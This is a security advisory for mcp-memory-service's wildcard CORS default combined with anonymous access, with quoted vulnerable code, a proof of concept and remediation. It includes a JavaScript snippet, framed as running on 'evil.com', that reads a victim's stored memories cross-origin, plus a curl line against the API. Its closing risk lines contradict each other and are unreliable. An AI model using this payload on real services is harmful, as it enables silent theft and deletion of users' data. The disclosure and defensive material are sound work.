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GHSA-g9rg-8vq5-mpwm
Summary
When the HTTP server is enabled (MCP_HTTP_ENABLED=true), the application configures FastAPI's CORSMiddleware with allow_origins=['*'], allow_credentials=True, allow_methods=["*"], and allow_headers=["*"]. The wildcard Access-Control-Allow-Origin: * header permits any website to read API responses cross-origin. When combined with anonymous access (MCP_ALLOW_ANONYMOUS_ACCESS=true) - the simplest way to get the HTTP dashboard working without OAuth - no credentials are needed, so any malicious website can silently read, modify, and delete all stored memories.
Details
Vulnerable Code
config.py:546 - Wildcard CORS origin default
CORS_ORIGINS = os.getenv('MCP_CORS_ORIGINS', '*').split(',')
This produces ['*'] by default, allowing any origin.
app.py:274-280 - CORSMiddleware configuration
# CORS middleware
app.add_middleware(
CORSMiddleware,
allow_origins=CORS_ORIGINS, # ['*'] by default
allow_credentials=True, # Unnecessary for anonymous access; bad practice
allow_methods=["*"],
allow_headers=["*"],
)
How the Attack Works
The wildcard CORS default means every API response includes Access-Control-Allow-Origin: *. This tells browsers to allow any website to read the response. When combined with anonymous access (no authentication required), the attack is straightforward:
// Running on https://evil.com - reads victim's memories
// No credentials needed - anonymous access means the API is open
const response = await fetch('http://192.168.1.100:8000/api/memories');
const memories = await response.json();
// memories contains every stored memory - passwords, API keys, personal notes
The browser sends the request, the server responds with ACAO: *, and the browser allows the JavaScript to read the response body. No cookies, no auth headers, no credentials of any kind.
Clarification on allow_credentials=True: The advisory originally stated that Starlette reflects the Origin header when allow_credentials=True with wildcard origins. Testing with Starlette 0.52.1 shows that actual responses return ACAO: * (not the reflected origin); only preflight OPTIONS responses reflect the origin. Per the Fetch specification, browsers block ACAO: * when credentials: 'include' is used. However, this is irrelevant to the attack because anonymous access means no credentials are needed - a plain fetch() without credentials: 'include' works, and ACAO: * allows it.
Two Attack Vectors
This misconfiguration enables two distinct attack paths:
1. Cross-origin browser attack (CORS - this advisory)
- Attacker lures victim to a malicious webpage
- JavaScript on the page reads/writes the memory service API
- Works from anywhere on the internet if the victim visits the page
- The
ACAO: *header is what allows the browser to expose the response to the attacker's JavaScript
2. Direct network access (compounding factor)
- Attacker on the same network directly calls the API (
curl http://<target>:8000/api/memories) - No CORS involved - CORS is a browser-only restriction
- Enabled by
0.0.0.0binding + anonymous access, independent of CORS configuration
The CORS misconfiguration specifically enables attack vector #1, extending the reach from local network to anyone who can get the victim to click a link.
Compounding Factors
HTTP_HOST = '0.0.0.0'- Binds to all interfaces, exposing the service to the entire network (enables attack vector #2)HTTPS_ENABLED = 'false'- No TLS by default, allowing passive interceptionMCP_ALLOW_ANONYMOUS_ACCESS- When enabled, no authentication is required at all. This is the key enabler: without it, the CORS wildcard alone would not allow data access (the attacker would need to forward valid credentials, whichACAO: *blocks)allow_credentials=True- Bad practice: if a future Starlette version changes to reflect origins (as some CORS implementations do), this would escalate the vulnerability by allowing credential-forwarding attacks against OAuth/API-key users- API key via query parameter -
api_keyquery param is cached in browser history and server logs
Attack Scenario
- Victim runs
mcp-memory-servicewith HTTP enabled and anonymous access - Victim visits
https://evil.comwhich includes JavaScript - JavaScript sends
fetch('http://<victim-ip>:8000/api/memories')(no credentials needed) - Server responds with
Access-Control-Allow-Origin: * - Browser allows JavaScript to read the response - attacker receives all memories
- Attacker's script also calls DELETE/PUT endpoints to modify or destroy memories
- Victim sees a normal web page; no indication of the attack
Root Cause
The default value of MCP_CORS_ORIGINS is *, which allows any website to read API responses. This is a permissive default that should be restricted to the expected dashboard origin (typically localhost). The allow_credentials=True is an additional misconfiguration that doesn't currently enable the attack.
PoC
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from starlette.testclient import TestClient
app = FastAPI()
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
@app.get("/api/memories")
def memories():
return [{"content": "secret memory data"}]
client = TestClient(app)
# Non-credentialed request (how the real attack works with anonymous access)
response = client.get("/api/memories", headers={"Origin": "https://evil.com"})
print(response.headers["access-control-allow-origin"]) # *
print(response.json()) # [{"content": "secret memory data"}]
# Any website can read this response because ACAO is *
Impact
- Complete cross-origin memory access: Any website can read all stored memories when the victim has the HTTP server running with anonymous access
- Memory tampering: Write/delete endpoints are also accessible cross-origin, allowing memory destruction
- Remote attack surface: Unlike direct network access (which requires LAN proximity), the CORS vector works from anywhere on the internet - the victim just needs to visit a link
- Silent exfiltration: The attack is invisible to the victim; no browser warnings, no popups, no indicators
Remediation
Replace the wildcard default with an explicit localhost origin:
# In config.py (safe default)
CORS_ORIGINS = os.getenv('MCP_CORS_ORIGINS', 'http://localhost:8000,http://127.0.0.1:8000').split(',')
# In app.py - warn on wildcard
if '*' in CORS_ORIGINS:
logger.warning("Wildcard CORS origin detected. This allows any website to access the API. "
"Set MCP_CORS_ORIGINS to restrict access.")
# Also: set allow_credentials=False unless specific origins are configured
app.add_middleware(
CORSMiddleware,
allow_origins=CORS_ORIGINS,
allow_credentials='*' not in CORS_ORIGINS, # Only with explicit origins
allow_methods=["*"],
allow_headers=["*"],
)
Affected Deployments
The vulnerability exists in the Python source code and is not mitigated by any deployment-specific configuration. Docker HTTP mode is the highest-risk deployment because it explicitly binds to 0.0.0.0, maps the port, and does not override the wildcard CORS default.
The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. The attacker needs the user to perform some action, like clicking a link. The impact is confined to the system where the vulnerability exists. There is a high impact on the confidentiality of the information. There is a high impact on the integrity of the data.
Exploitation activity has been observed. Apply available patches or mitigations urgently.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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